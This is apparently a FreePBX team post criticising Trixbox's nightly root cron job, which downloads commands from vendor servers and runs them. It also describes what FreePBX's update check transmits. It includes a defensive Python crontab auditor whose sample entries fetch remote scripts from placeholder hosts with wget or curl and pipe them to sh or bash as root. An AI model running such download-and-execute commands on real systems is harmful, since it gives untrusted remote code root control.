Security Concerns with Trixbox

Trixbox is a popular platform that packages our PBX application on top of Asterisk on a CentOS-based distribution. There has been some recent news concerning bad security practices and potential privacy issues. In the best interest of all of our installed base, it is our hope that Fonality, the sponsors of Trixbox, will actively contact their installed base to make them aware of this serious security issue, which could significantly compromise customer systems if not addressed quickly.

The privacy issues that are being discussed are not the topic of our concern and are between Fonality and their customer base. Our concern is the mechanism that they have used to implement the [i]phone home[/i] solution. You can read details in [i][url=http://www.trixbox.org/forums/trixbox-forums/open-discussion/trixbox-phones-home]this Trixbox thread[/url][/i] as well as other discussions on their forum and elsewhere.

In summary, they have installed a cron job which contacts the Fonality servers on a nightly basis, downloads a set of commands, executes those commands as root, and then sends data back to their servers. In the wrong hands, this becomes a [i]trojan horse[/i], and the magnitude of the disaster it could create is immense if their servers were compromised from outside, by disgruntled employees, or through compromised DNS servers (man in the middle).
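An administrator can check a system for this class of job by scanning system crontab entries for root jobs that download content and pass it to an interpreter. The following is an added example, not code from Trixbox, Fonality or FreePBX; the cron entries, hostnames and paths are constructed placeholders and do not reproduce the actual Trixbox job.

```python
import re

# Constructed sample in /etc/cron.d format (schedule, user, command).
# Hosts and paths are placeholders, not taken from any real system.
SAMPLE_CRON = """\
# nightly jobs
MAILTO=root
0 3 * * * root wget -q -O - http://updates.example.invalid/cmds | sh
15 3 * * * root curl -s https://updates.example.invalid/job.sh -o /tmp/job.sh && sh /tmp/job.sh
30 4 * * * asterisk /usr/local/bin/rotate_logs.sh
0 5 * * * root /usr/bin/php /var/lib/example/check_updates.php
@daily root curl -s http://updates.example.invalid/run | bash
"""

FETCH = re.compile(r"\b(?:wget|curl)\b")
PIPE_TO_INTERP = re.compile(r"\|\s*(?:sh|bash|ksh|perl|php|python\d?)\b")
SAVED_FILE = re.compile(r"(?:-o|-O|--output(?:-document)?)[ =]*(/\S+)")

def parse_line(line):
    """Return (user, command) for a system crontab entry, else None."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"\w+\s*=", line):
        return None                      # blank, comment or VAR=value
    n_sched = 1 if line.startswith("@") else 5
    parts = line.split(None, n_sched + 1)
    if len(parts) < n_sched + 2:
        return None
    return parts[-2], parts[-1]

def audit(text):
    """Flag root entries that download content and hand it to an interpreter."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_line(line)
        if entry is None or entry[0] != "root":
            continue
        cmd = entry[1]
        if not FETCH.search(cmd):
            continue  # a local script that fetches internally needs manual review
        saved = SAVED_FILE.search(cmd)
        if PIPE_TO_INTERP.search(cmd):
            findings.append((lineno, "download piped to interpreter"))
        elif saved and saved.group(1) in cmd[saved.end():]:
            findings.append((lineno, "download saved, then executed"))
    return findings

if __name__ == "__main__":
    for lineno, reason in audit(SAMPLE_CRON):
        print(f"line {lineno}: {reason}")
```

The scan only sees what is written in the crontab itself: a root job that calls a local script (line 6 of the sample) is not flagged, so the script it points to still has to be read by hand.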

In the above thread it is mentioned that FreePBX [i]phones home[/i] as well. Instead of splitting hairs over definitions, let me make it perfectly clear what FreePBX does. Most of you are aware of our [i]Online Module Repository[/i], which provides easy updates to new versions of FreePBX and its modules (vs. pulling tarballs manually). When you access our server, we transmit the following information: FreePBX and Asterisk version numbers and a unique identification number that is generated at installation time and cannot be traced back to you. We generate this number by taking an md5sum hash of your MAC address. If you are running in a virtual environment such as a VMware or Xensource system, we create the hash randomly. (We generate this so we don’t have to use IP addresses, which can often be traced back to you or, when dynamic, don’t allow accurate information to be kept.) We use this information to properly serve your upgrades, as we need to know what version of FreePBX you are running. In addition, we use this information to help us during beta programs. You may recall the [url=/news/2007-08-23/freepbx-2-3-0-and-new-website-simultaneously-released]statistics[/url] that I fed back to you during the FreePBX 2.3 Beta program that helped us gauge the level of beta and Asterisk 1.4 coverage. The Asterisk and FreePBX version statistics also help us make good development decisions to serve our customer base.
This information is transmitted when you click on [i]Check for Updates Online[/i], or nightly if you have chosen to have updates checked for you. (The nightly checks execute the exact same code as the manual check; there is no difference.)
If we ever wanted to obtain more detailed information about your system, it would be on an opt-in only basis, the code would be there for you to see, and we would never implement something that could pull arbitrary commands from a server just waiting to be compromised.

If there are any questions or concerns with FreePBX, please start the discussion in the Forum or contact me offline.

Philippe – On behalf of the FreePBX Team